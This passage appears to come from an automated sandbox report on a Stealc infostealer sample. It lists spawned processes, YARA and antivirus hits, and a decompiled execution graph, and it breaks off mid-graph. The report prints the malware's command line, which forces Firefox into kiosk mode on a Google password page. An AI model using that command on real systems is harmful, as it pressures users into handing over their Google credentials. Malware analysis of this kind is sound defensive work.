                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff613480000
                                                                                                                                                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                        Start time:10:48:55
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff613480000
                                                                                                                                                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002B.00000002.2491500061.000002392DCA0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002B.00000002.2489426233.000002392C270000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                        Start time:10:48:55
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff613480000
                                                                                                                                                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002C.00000002.2615996030.00000144AA140000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000002C.00000002.2615892313.00000144AA0F0000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                                                                        Start time:10:48:57
                                                                                                                                                                                                                                                                                        Start date:12/12/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                                                                                                                                                        File size:1'807'360 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:CD917C036DA4DC2B3E30E12B135A87E2
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000003.2490452576.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:3.9%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                          Signature Coverage:32.7%
                                                                                                                                                                                                                                                                                          Total number of Nodes:594
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                                                                                                                                                          execution_graph 10212 249ba5 10213 249ba7 10212->10213 10214 245c10 2 API calls 10213->10214 10215 249cb1 10214->10215 10216 248b30 2 API calls 10215->10216 10217 249cc2 10216->10217 9773 24b1a0 9774 24b1f2 9773->9774 9775 24b3ad CoInitialize 9774->9775 9776 24b3fa shared_ptr std::invalid_argument::invalid_argument 9775->9776 9901 2420a0 9904 25c68b 9901->9904 9903 2420ac 9907 25c3d5 9904->9907 9906 25c69b 9906->9903 9908 25c3e1 9907->9908 9909 25c3eb 9907->9909 9910 25c39e 9908->9910 9911 25c3be 9908->9911 9909->9906 9910->9909 9916 25ccd5 9910->9916 9920 25cd0a 9911->9920 9913 25c3d0 9913->9906 9917 25cce3 InitializeCriticalSectionEx 9916->9917 9918 25c3b7 9916->9918 9917->9918 9918->9906 9921 25cd1f RtlInitializeConditionVariable 9920->9921 9921->9913 9975 244120 9976 24416a 9975->9976 9978 2441b2 std::invalid_argument::invalid_argument 9976->9978 9979 243ee0 9976->9979 9980 243f1e 9979->9980 9981 243f48 9979->9981 9980->9978 9982 243f58 9981->9982 9985 242c00 9981->9985 9982->9978 9986 242c0e 9985->9986 9992 25b847 9986->9992 9988 242c42 9989 242c49 9988->9989 9998 242c80 9988->9998 9989->9978 9991 242c58 Concurrency::cancel_current_task 9993 25b854 9992->9993 9997 25b873 Concurrency::details::_Reschedule_chore 9992->9997 10001 25cb77 9993->10001 9995 25b864 9995->9997 10003 25b81e 9995->10003 9997->9988 10009 25b7fb 9998->10009 10000 242cb2 shared_ptr 10000->9991 10002 25cb92 CreateThreadpoolWork 10001->10002 10002->9995 10005 25b827 Concurrency::details::_Reschedule_chore 10003->10005 10007 25cdcc 10005->10007 10006 25b841 10006->9997 10008 25cde1 TpPostWork 10007->10008 10008->10006 10010 25b807 10009->10010 10011 25b817 10009->10011 10010->10011 10013 25ca78 10010->10013 10011->10000 10014 25ca8d TpReleaseWork 10013->10014 10014->10011 10342 243fe0 10343 244022 10342->10343 10344 2440d2 10343->10344 10345 24408c 10343->10345 10348 244035 std::invalid_argument::invalid_argument 10343->10348 10346 243ee0 3 API calls 10344->10346 10349 2435e0 10345->10349 10346->10348 10350 243616 10349->10350 10354 24364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10350->10354 10355 242ce0 10350->10355 10352 24369e 10353 242c00 3 API calls 10352->10353 10352->10354 10353->10354 10354->10348 10356 242d1d 10355->10356 10357 25bedf InitOnceExecuteOnce 10356->10357 10358 242d46 10357->10358 10359 242d51 std::invalid_argument::invalid_argument 10358->10359 10361 25bef7 10358->10361 10359->10352 10362 25bf03 Concurrency::cancel_current_task 10361->10362 10363 25bf73 10362->10363 10364 25bf6a 10362->10364 10366 242ae0 InitOnceExecuteOnce 10363->10366 10368 25be7f 10364->10368 10367 25bf6f 10366->10367 10367->10359 10369 25cc31 InitOnceExecuteOnce 10368->10369 10370 25be97 10369->10370 10370->10367 10218 247fa9 10219 247fab ___std_exception_copy 10218->10219 10220 245c10 2 API calls 10219->10220 10223 247ff2 shared_ptr std::invalid_argument::invalid_argument 10219->10223 10221 248427 10220->10221 10222 245c10 2 API calls 10221->10222 10222->10223 9796 276629 9799 2764c7 9796->9799 9800 2764d5 9799->9800 9801 276520 9800->9801 9804 27652b 9800->9804 9803 27652a 9810 27a302 GetPEB 9804->9810 9806 276535 9807 27654a 9806->9807 9808 27653a GetPEB 9806->9808 9809 276562 ExitProcess 9807->9809 9808->9807 9811 27a31c 9810->9811 9811->9806 10049 24a9f4 10058 249230 10049->10058 10051 24aa03 shared_ptr 10052 245c10 2 API calls 10051->10052 10057 24aab3 shared_ptr std::invalid_argument::invalid_argument 10051->10057 10053 24aa65 10052->10053 10054 245c10 2 API calls 10053->10054 10055 24aa8d 10054->10055 10056 245c10 2 API calls 10055->10056 10056->10057 10061 249284 shared_ptr 10058->10061 10059 245c10 2 API calls 10059->10061 10060 249543 shared_ptr std::invalid_argument::invalid_argument 10060->10051 10061->10059 10066 24944f shared_ptr 10061->10066 10062 245c10 2 API calls 10062->10066 10063 2498b5 shared_ptr std::invalid_argument::invalid_argument 10063->10051 10064 24979f shared_ptr 10064->10063 10065 245c10 2 API calls 10064->10065 10067 249927 shared_ptr std::invalid_argument::invalid_argument 10065->10067 10066->10060 10066->10062 10066->10064 10067->10051 10072 244276 10073 242410 4 API calls 10072->10073 10074 24427f 10073->10074 9812 248437 9813 248439 9812->9813 9814 245c10 2 API calls 9813->9814 9815 248454 shared_ptr std::invalid_argument::invalid_argument 9814->9815 10022 242170 10025 25c6fc 10022->10025 10024 24217a 10026 25c724 10025->10026 10027 25c70c 10025->10027 10026->10024 10027->10026 10029 25cfbe 10027->10029 10030 25ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10029->10030 10031 25cfd0 10030->10031 10031->10027 10075 2442b0 10078 243ac0 10075->10078 10077 2442bb shared_ptr 10079 243af9 10078->10079 10081 2432d0 5 API calls 10079->10081 10082 243c38 10079->10082 10083 243b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10079->10083 10080 2432d0 5 API calls 10084 243c5f 10080->10084 10081->10082 10082->10080 10082->10084 10083->10077 10084->10077 10224 2477b0 10225 2477f1 shared_ptr 10224->10225 10226 245c10 2 API calls 10225->10226 10228 247883 shared_ptr 10225->10228 10226->10228 10227 245c10 2 API calls 10230 2479e3 10227->10230 10228->10227 10229 247953 shared_ptr std::invalid_argument::invalid_argument 10228->10229 10231 245c10 2 API calls 10230->10231 10233 247a15 shared_ptr 10231->10233 10232 247aa5 shared_ptr std::invalid_argument::invalid_argument 10233->10232 10234 245c10 2 API calls 10233->10234 10238 247be3 shared_ptr ___std_exception_copy 10233->10238 10235 247b7d 10234->10235 10236 245c10 2 API calls 10235->10236 10237 247ba0 10236->10237 10239 245c10 2 API calls 10237->10239 10240 245c10 2 API calls 10238->10240 10278 247cf4 shared_ptr std::invalid_argument::invalid_argument 10238->10278 10239->10238 10241 247dd2 10240->10241 10242 245c10 2 API calls 10241->10242 10244 247dff shared_ptr 10242->10244 10243 247ed3 GetNativeSystemInfo 10245 247ed7 10243->10245 10244->10243 10244->10245 10255 247f86 ___std_exception_copy 10244->10255 10246 247f3f 10245->10246 10247 248019 10245->10247 10245->10278 10249 245c10 2 API calls 10246->10249 10248 245c10 2 API calls 10247->10248 10250 24804c 10248->10250 10251 247f67 10249->10251 10252 245c10 2 API calls 10250->10252 10254 245c10 2 API calls 10251->10254 10256 24806b 10252->10256 10253 245c10 2 API calls 10257 248427 10253->10257 10254->10255 10255->10253 10255->10278 10259 245c10 2 API calls 10256->10259 10258 245c10 2 API calls 10257->10258 10258->10278 10260 2480a3 10259->10260 10261 245c10 2 API calls 10260->10261 10262 2480f4 10261->10262 10263 245c10 2 API calls 10262->10263 10264 248113 10263->10264 10265 245c10 2 API calls 10264->10265 10266 24814b 10265->10266 10267 245c10 2 API calls 10266->10267 10268 24819c 10267->10268 10269 245c10 2 API calls 10268->10269 10270 2481bb 10269->10270 10271 245c10 2 API calls 10270->10271 10272 2481f3 10271->10272 10273 245c10 2 API calls 10272->10273 10274 248244 10273->10274 10275 245c10 2 API calls 10274->10275 10276 248263 10275->10276 10277 245c10 2 API calls 10276->10277 10277->10278 10279 2487b0 10280 2487b6 10279->10280 10281 2487b8 GetFileAttributesA 10279->10281 10280->10281 10282 2487c4 10281->10282 10283 2547b0 10285 254eed 10283->10285 10284 254f59 shared_ptr std::invalid_argument::invalid_argument 10285->10284 10286 247d30 3 API calls 10285->10286 10287 2550ed 10286->10287 10322 248380 10287->10322 10289 255106 10290 245c10 2 API calls 10289->10290 10291 255155 10290->10291 10292 245c10 2 API calls 10291->10292 10293 255171 10292->10293 10328 249a00 10293->10328 10323 2483e5 ___std_exception_copy 10322->10323 10324 245c10 2 API calls 10323->10324 10327 248403 shared_ptr std::invalid_argument::invalid_argument 10323->10327 10325 248427 10324->10325 10326 245c10 2 API calls 10325->10326 10326->10327 10327->10289 10329 249a3f 10328->10329 10330 245c10 2 API calls 10329->10330 10331 249a47 10330->10331 10332 248b30 2 API calls 10331->10332 10333 249a58 10332->10333 9777 2487b2 9778 2487b6 9777->9778 9779 2487b8 GetFileAttributesA 9777->9779 9778->9779 9780 2487c4 9779->9780 10089 249ab8 10091 249acc 10089->10091 10092 249b08 10091->10092 10093 245c10 2 API calls 10092->10093 10094 249b7c 10093->10094 10101 248b30 10094->10101 10096 249b8d 10097 245c10 2 API calls 10096->10097 10098 249cb1 10097->10098 10099 248b30 2 API calls 10098->10099 10100 249cc2 10099->10100 10102 248b7c 10101->10102 10103 245c10 2 API calls 10102->10103 10104 248b97 shared_ptr std::invalid_argument::invalid_argument 10103->10104 10104->10096 10129 249f44 10130 249f4c shared_ptr 10129->10130 10131 24a953 Sleep CreateMutexA 10130->10131 10132 24a01f shared_ptr 10130->10132 10133 24a98e 10131->10133 9826 243c47 9827 243c51 9826->9827 9829 243c5f 9827->9829 9830 2432d0 9827->9830 9849 25c6ac 9830->9849 9832 24336b 9855 25c26a 9832->9855 9834 24333c __Mtx_unlock 9836 25c26a 4 API calls 9834->9836 9837 243350 std::invalid_argument::invalid_argument 9834->9837 9838 243377 9836->9838 9837->9829 9840 25c6ac GetSystemTimePreciseAsFileTime 9838->9840 9839 243314 9839->9832 9839->9834 9852 25bd4c 9839->9852 9841 2433af 9840->9841 9842 25c26a 4 API calls 9841->9842 9843 2433b6 __Cnd_broadcast 9841->9843 9842->9843 9844 25c26a 4 API calls 9843->9844 9845 2433d7 __Mtx_unlock 9843->9845 9844->9845 9846 25c26a 4 API calls 9845->9846 9847 2433eb 9845->9847 9848 24340e 9846->9848 9847->9829 9848->9829 9862 25c452 9849->9862 9851 25c6b9 9851->9839 9879 25bb72 9852->9879 9854 25bd5c 9854->9839 9856 25c274 9855->9856 9861 25c292 ___std_exception_copy 9855->9861 9857 25c283 9856->9857 9856->9861 9885 25c297 9857->9885 9888 2765ed 9861->9888 9863 25c4a8 9862->9863 9864 25c47a std::invalid_argument::invalid_argument 9862->9864 9863->9864 9868 25cf6b 9863->9868 9864->9851 9866 25c4fd __Xtime_diff_to_millis2 9866->9864 9867 25cf6b _xtime_get GetSystemTimePreciseAsFileTime 9866->9867 9867->9866 9869 25cf7a 9868->9869 9871 25cf87 __aulldvrm 9868->9871 9869->9871 9872 25cf44 9869->9872 9871->9866 9875 25cbea 9872->9875 9876 25cc07 9875->9876 9877 25cbfb GetSystemTimePreciseAsFileTime 9875->9877 9876->9871 9877->9876 9880 25bb9c 9879->9880 9881 25cf6b _xtime_get GetSystemTimePreciseAsFileTime 9880->9881 9884 25bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 9880->9884 9882 25bbcf __Xtime_diff_to_millis2 9881->9882 9883 25cf6b _xtime_get GetSystemTimePreciseAsFileTime 9882->9883 9882->9884 9883->9884 9884->9854 9891 242ae0 9885->9891 9887 25c2ae Concurrency::cancel_current_task 9889 2764c7 3 API calls 9888->9889 9890 2765fe 9889->9890 9894 25bedf 9891->9894 9893 242af4 ___std_exception_copy 9893->9887 9897 25cc31 9894->9897 9898 25cc3f InitOnceExecuteOnce 9897->9898 9900 25bef2 9897->9900 9898->9900 9900->9893 9963 2420c0 9964 25c68b __Mtx_init_in_situ 2 API calls 9963->9964 9965 2420cc 9964->9965 9966 24e0c0 recv 9967 24e122 recv 9966->9967 9968 24e157 recv 9967->9968 9969 24e191 9968->9969 9970 24e2b3 std::invalid_argument::invalid_argument 9969->9970 9971 25c6ac GetSystemTimePreciseAsFileTime 9969->9971 9972 24e2ee 9971->9972 9973 25c26a 4 API calls 9972->9973 9974 24e358 9973->9974 10045 248980 10047 248aea 10045->10047 10048 2489d8 shared_ptr 10045->10048 10046 245c10 2 API calls 10046->10048 10048->10046 10048->10047 10068 242e00 10069 242e28 10068->10069 10070 25c68b __Mtx_init_in_situ 2 API calls 10069->10070 10071 242e33 10070->10071 9781 245c83 9783 245c91 shared_ptr ___std_exception_copy 9781->9783 9782 245d17 shared_ptr std::invalid_argument::invalid_argument 9783->9782 9784 245da7 RegOpenKeyExA 9783->9784 9785 245e00 RegCloseKey 9784->9785 9787 245e26 9785->9787 9786 245ea6 shared_ptr std::invalid_argument::invalid_argument 9787->9786 9788 245c10 2 API calls 9787->9788 9789 2466ac 9788->9789 9790 245c10 2 API calls 9789->9790 9791 2466b1 shared_ptr 9790->9791 9792 245c10 2 API calls 9791->9792 9795 246852 shared_ptr std::invalid_argument::invalid_argument 9791->9795 9794 24673d shared_ptr 9792->9794 9793 245c10 2 API calls 9793->9794 9794->9793 9794->9795 9922 243c8e 9923 243c98 9922->9923 9925 243ca5 9923->9925 9926 242410 9923->9926 9927 242424 9926->9927 9930 25b52d 9927->9930 9938 273aed 9930->9938 9933 25b5a5 ___std_exception_copy 9945 25b1ad 9933->9945 9934 25b598 9941 25af56 9934->9941 9937 24242a 9937->9925 9949 274f29 9938->9949 9940 25b555 9940->9933 9940->9934 9940->9937 9942 25af9f ___std_exception_copy 9941->9942 9944 25afb2 shared_ptr 9942->9944 9953 25b39f 9942->9953 9944->9937 9946 25b1d8 9945->9946 9948 25b1e1 shared_ptr 9945->9948 9947 25b39f InitOnceExecuteOnce 9946->9947 9947->9948 9948->9937 9950 274f2e ___std_exception_copy 9949->9950 9950->9940 9951 2765ed 3 API calls 9950->9951 9952 278c2f 9951->9952 9954 25bedf InitOnceExecuteOnce 9953->9954 9956 25b3e1 9954->9956 9955 25b3e8 9955->9944 9956->9955 9957 25bedf InitOnceExecuteOnce 9956->9957 9958 25b461 9957->9958 9958->9944 9710 24a856 9711 24a870 9710->9711 9712 24a892 shared_ptr 9710->9712 9711->9712 9713 24a94e 9711->9713 9717 24a8a0 9712->9717 9726 247d30 9712->9726 9716 24a953 Sleep CreateMutexA 9713->9716 9715 24a8ae 9715->9717 9719 247d30 3 API calls 9715->9719 9718 24a98e 9716->9718 9720 24a8b8 9719->9720 9720->9717 9721 247d30 3 API calls 9720->9721 9722 24a8c2 9721->9722 9722->9717 9723 247d30 3 API calls 9722->9723 9724 24a8cc 9723->9724 9724->9717 9725 247d30 3 API calls 9724->9725 9725->9717 9727 247d96 ___std_exception_copy 9726->9727 9752 247ee8 shared_ptr std::invalid_argument::invalid_argument 9727->9752 9767 245c10 9727->9767 9729 247dd2 9730 245c10 2 API calls 9729->9730 9732 247dff shared_ptr 9730->9732 9731 247ed3 GetNativeSystemInfo 9733 247ed7 9731->9733 9732->9731 9732->9733 9743 247f86 ___std_exception_copy 9732->9743 9734 247f3f 9733->9734 9735 248019 9733->9735 9733->9752 9737 245c10 2 API calls 9734->9737 9736 245c10 2 API calls 9735->9736 9738 24804c 9736->9738 9739 247f67 9737->9739 9740 245c10 2 API calls 9738->9740 9742 245c10 2 API calls 9739->9742 9744 24806b 9740->9744 9741 245c10 2 API calls 9745 248427 9741->9745 9742->9743 9743->9741 9743->9752 9747 245c10 2 API calls 9744->9747 9746 245c10 2 API calls 9745->9746 9746->9752 9748 2480a3 9747->9748 9749 245c10 2 API calls 9748->9749 9750 2480f4 9749->9750 9751 245c10 2 API calls 9750->9751 9753 248113 9751->9753 9752->9715 9754 245c10 2 API calls 9753->9754 9755 24814b 9754->9755 9756 245c10 2 API calls 9755->9756 9757 24819c 9756->9757 9758 245c10 2 API calls 9757->9758 9759 2481bb 9758->9759 9760 245c10 2 API calls 9759->9760 9761 2481f3 9760->9761 9762 245c10 2 API calls 9761->9762 9763 248244 9762->9763 9764 245c10 2 API calls 9763->9764 9765 248263 9764->9765 9766 245c10 2 API calls 9765->9766 9766->9752 9769 245c54 ___std_exception_copy 9767->9769 9768 245d17 shared_ptr std::invalid_argument::invalid_argument 9768->9729 9769->9768 9770 245da7 RegOpenKeyExA 9769->9770 9771 245e00 RegCloseKey 9770->9771 9772 245e26 shared_ptr std::invalid_argument::invalid_argument 9771->9772 9772->9729 10124 242b10 10125 242b1c 10124->10125 10126 242b1a 10124->10126 10127 25c26a 4 API calls 10125->10127 10128 242b22 10127->10128 10334 242b90 10335 242bce 10334->10335 10336 25b7fb TpReleaseWork 10335->10336 10337 242bdb shared_ptr std::invalid_argument::invalid_argument 10336->10337 10371 2587d0 10372 25882a ___std_exception_copy 10371->10372 10378 259bb0 10372->10378 10376 2588d9 std::_Throw_future_error 10377 25886c std::invalid_argument::invalid_argument 10388 259ef0 10378->10388 10380 259be5 10381 242ce0 InitOnceExecuteOnce 10380->10381 10382 259c16 10381->10382 10392 259f70 10382->10392 10384 258854 10384->10377 10385 2443f0 10384->10385 10386 25bedf InitOnceExecuteOnce 10385->10386 10387 24440a 10386->10387 10387->10376 10389 259f0c 10388->10389 10390 25c68b __Mtx_init_in_situ 2 API calls 10389->10390 10391 259f17 10390->10391 10391->10380 10393 259fef shared_ptr 10392->10393 10396 25a058 10393->10396 10397 25a210 10393->10397 10395 25a03b 10395->10384 10398 25a290 10397->10398 10404 2571d0 10398->10404 10400 25a2cc shared_ptr 10401 25a4be shared_ptr 10400->10401 10402 243ee0 3 API calls 10400->10402 10401->10395 10403 25a4a6 10402->10403 10403->10395 10405 257211 10404->10405 10412 243970 10405->10412 10407 257446 std::invalid_argument::invalid_argument 10407->10400 10408 2572ad ___std_exception_copy 10408->10407 10409 25c68b __Mtx_init_in_situ 2 API calls 10408->10409 10410 257401 10409->10410 10417 242ec0 10410->10417 10413 25c68b __Mtx_init_in_situ 2 API calls 10412->10413 10414 2439a7 10413->10414 10415 25c68b __Mtx_init_in_situ 2 API calls 10414->10415 10416 2439e6 10415->10416 10416->10408 10418 242f06 10417->10418 10421 242f6f 10417->10421 10419 25c6ac GetSystemTimePreciseAsFileTime 10418->10419 10420 242f12 10419->10420 10423 24301e 10420->10423 10426 242f1d __Mtx_unlock 10420->10426 10422 242fef 10421->10422 10428 25c6ac GetSystemTimePreciseAsFileTime 10421->10428 10422->10407 10424 25c26a 4 API calls 10423->10424 10425 243024 10424->10425 10427 25c26a 4 API calls 10425->10427 10426->10421 10426->10425 10429 242fb9 10427->10429 10428->10429 10430 25c26a 4 API calls 10429->10430 10431 242fc0 __Mtx_unlock 10429->10431 10430->10431 10432 25c26a 4 API calls 10431->10432 10433 242fd8 __Cnd_broadcast 10431->10433 10432->10433 10433->10422 10434 25c26a 4 API calls 10433->10434 10435 24303c 10434->10435 10436 25c6ac GetSystemTimePreciseAsFileTime 10435->10436 10446 243080 shared_ptr __Mtx_unlock 10436->10446 10437 2431c5 10438 25c26a 4 API calls 10437->10438 10439 2431cb 10438->10439 10440 25c26a 4 API calls 10439->10440 10441 2431d1 10440->10441 10442 25c26a 4 API calls 10441->10442 10448 243193 __Mtx_unlock 10442->10448 10443 2431a7 std::invalid_argument::invalid_argument 10443->10407 10444 25c26a 4 API calls 10445 2431dd 10444->10445 10446->10437 10446->10439 10446->10443 10447 25c6ac GetSystemTimePreciseAsFileTime 10446->10447 10449 24315f 10447->10449 10448->10443 10448->10444 10449->10437 10449->10441 10449->10448 10450 25bd4c GetSystemTimePreciseAsFileTime 10449->10450 10450->10449 10110 249adc 10111 249aea 10110->10111 10115 249afe shared_ptr 10110->10115 10112 24a917 10111->10112 10111->10115 10113 24a953 Sleep CreateMutexA 10112->10113 10114 24a98e 10113->10114 10116 245c10 2 API calls 10115->10116 10117 249b7c 10116->10117 10118 248b30 2 API calls 10117->10118 10119 249b8d 10118->10119 10120 245c10 2 API calls 10119->10120 10121 249cb1 10120->10121 10122 248b30 2 API calls 10121->10122 10123 249cc2 10122->10123 10338 243f9f 10339 243fb6 10338->10339 10340 243fad 10338->10340 10341 242410 4 API calls 10340->10341 10341->10339 10037 24215a 10038 25c6fc InitializeCriticalSectionEx 10037->10038 10039 242164 10038->10039 10139 24735a 10141 247368 shared_ptr 10139->10141 10140 247400 shared_ptr std::invalid_argument::invalid_argument 10141->10140 10146 24765e shared_ptr 10141->10146 10200 25d111 10141->10200 10143 2475ed 10143->10146 10204 25d0c7 10143->10204 10145 24777f shared_ptr 10146->10145 10147 245c10 2 API calls 10146->10147 10149 247883 shared_ptr 10146->10149 10147->10149 10148 245c10 2 API calls 10151 2479e3 10148->10151 10149->10148 10150 247953 shared_ptr std::invalid_argument::invalid_argument 10149->10150 10152 245c10 2 API calls 10151->10152 10154 247a15 shared_ptr 10152->10154 10153 247aa5 shared_ptr std::invalid_argument::invalid_argument 10154->10153 10155 245c10 2 API calls 10154->10155 10159 247be3 shared_ptr ___std_exception_copy 10154->10159 10156 247b7d 10155->10156 10157 245c10 2 API calls 10156->10157 10158 247ba0 10157->10158 10160 245c10 2 API calls 10158->10160 10161 245c10 2 API calls 10159->10161 10181 247cf4 shared_ptr std::invalid_argument::invalid_argument 10159->10181 10160->10159 10162 247dd2 10161->10162 10163 245c10 2 API calls 10162->10163 10165 247dff shared_ptr 10163->10165 10164 247ed3 GetNativeSystemInfo 10166 247ed7 10164->10166 10165->10164 10165->10166 10176 247f86 ___std_exception_copy 10165->10176 10167 247f3f 10166->10167 10168 248019 10166->10168 10166->10181 10170 245c10 2 API calls 10167->10170 10169 245c10 2 API calls 10168->10169 10171 24804c 10169->10171 10172 247f67 10170->10172 10173 245c10 2 API calls 10171->10173 10175 245c10 2 API calls 10172->10175 10177 24806b 10173->10177 10174 245c10 2 API calls 10178 248427 10174->10178 10175->10176 10176->10174 10176->10181 10180 245c10 2 API calls 10177->10180 10179 245c10 2 API calls 10178->10179 10179->10181 10182 2480a3 10180->10182 10183 245c10 2 API calls 10182->10183 10184 2480f4 10183->10184 10185 245c10 2 API calls 10184->10185 10186 248113 10185->10186 10187 245c10 2 API calls 10186->10187 10188 24814b 10187->10188 10189 245c10 2 API calls 10188->10189 10190 24819c 10189->10190 10191 245c10 2 API calls 10190->10191 10192 2481bb 10191->10192 10193 245c10 2 API calls 10192->10193 10194 2481f3 10193->10194 10195 245c10 2 API calls 10194->10195 10196 248244 10195->10196 10197 245c10 2 API calls 10196->10197 10198 248263 10197->10198 10199 245c10 2 API calls 10198->10199 10199->10181 10201 25d122 10200->10201 10202 25d12a 10201->10202 10208 25d199 10201->10208 10202->10143 10205 25d0d7 10204->10205 10206 25d17b RtlWakeAllConditionVariable 10205->10206 10207 25d17f 10205->10207 10206->10146 10207->10146 10209 25d1a7 SleepConditionVariableCS 10208->10209 10211 25d1c0 10208->10211 10209->10211 10211->10201

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 0 245c83-245c8f 1 245ca5-245cf7 call 25d663 0->1 2 245c91-245c9f 0->2 13 245d21-245d3c call 25cff1 1->13 14 245cf9-245d05 1->14 2->1 3 245d3d 2->3 5 245d42-245e23 call 276c6a call 2740f0 RegOpenKeyExA RegCloseKey 3->5 6 245d3d call 276c6a 3->6 24 245e26-245e2b 5->24 6->5 16 245d17-245d1e call 25d663 14->16 17 245d07-245d15 14->17 16->13 17->5 17->16 24->24 25 245e2d-245e86 call 2580c0 24->25 29 245eb0-245ecc call 25cff1 25->29 30 245e88-245e94 25->30 31 245ea6-245ead call 25d663 30->31 32 245e96-245ea4 30->32 31->29 32->31 35 245ecd-245fde call 276c6a 32->35 45 245fe0-245fec 35->45 46 246008-246015 call 25cff1 35->46 48 245ffe-246005 call 25d663 45->48 49 245fee-245ffc 45->49 48->46 49->48 51 246016-24658e call 276c6a call 25e150 call 2580c0 * 5 49->51 74 246590-24659f 51->74 75 2465bb-2465d6 call 25cff1 51->75 76 2465b1-2465b8 call 25d663 74->76 77 2465a1-2465af 74->77 76->75 77->76 80 2465d7-2466b8 call 276c6a call 257a00 call 245c10 77->80 95 2466bc-2466db call 2422c0 80->95 96 2466ba 80->96 99 24670c-246712 95->99 100 2466dd-2466ec 95->100 96->95 103 246715-24671a 99->103 101 246702-246709 call 25d663 100->101 102 2466ee-2466fc 100->102 101->99 102->101 104 246937 call 276c6a 102->104 103->103 106 24671c-246744 call 257a00 call 245c10 103->106 111 24693c call 276c6a 104->111 116 246746 106->116 117 246748-246769 call 2422c0 106->117 115 246941-246d6f call 276c6a call 258200 call 276c6a 111->115 116->117 123 24679a-2467ae 117->123 124 24676b-24677a 117->124 134 